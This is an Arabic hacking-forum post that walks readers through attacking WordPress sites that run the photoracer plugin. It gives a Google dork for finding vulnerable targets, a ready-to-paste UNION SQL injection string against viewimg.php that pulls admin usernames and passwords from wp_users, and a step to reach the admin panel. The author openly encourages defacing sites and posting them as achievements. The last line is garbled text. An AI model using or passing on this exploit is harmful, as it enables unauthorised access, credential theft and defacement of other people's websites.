السلام عليكم ورحمه الله وبركاته .
كيفكم . أخواني إن شاء الله الكل بخير ..
اليوم معي ، ثغرة حلوة في
سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع المصابــة .
ونبغى نشوف ،، قسم االإنجازات مليان مواقع مخترقه من قبلكم ياعناكبي .
..
نبدأ بسم الله .:
أولا.:
الدوركـ .:
 | اقتباس |  | | | | | | | | | |
inurl:"wp-content/plugins/photoracer/viewimg.php?id=" | |  | |  | |
بتفتح قوقل كالعادة وبتحط الدورك وبتطلع لك مواقع واختار
اي واحد الي يعجبــك ..
ثانيــأ.:
الإٍستغلال .:
بتسوي كذا على طول ...:
| | اقتباس | | | | | | | | | | | كود PHP: wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
| | | | | | |
يعني مثال .:
www.xxx.com/
انت خذ الاستغلال الي فوق وحطـه بعد رابط الموقع وشوف وش يطلع لك..
بطلع لك الباسورد واليوزر تبع الادمن .. .:
مثال كامل . على الاستغلال .:
| | اقتباس | | | | | | | | | | | www.xxx.com/
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users-- | | | | | | |
فهمـتووو كيف ياحلوين ..
ثالثـأ.:
لوحـة التحكم .:
| | اقتباس | | | | | |
بس بتسوي بعد رابط الموقع هيك .:
وبتطلع لك لوحـة التحكم .....
..
يالله ، بدي اشوف اندكسات
..
أخوكم .:
بالتوفيــــــــــــــق لــكــم ..
WordPress v1>0 SQL Injection << juhg hguf td s;vfjhj ,v]vfvs iiii g,,g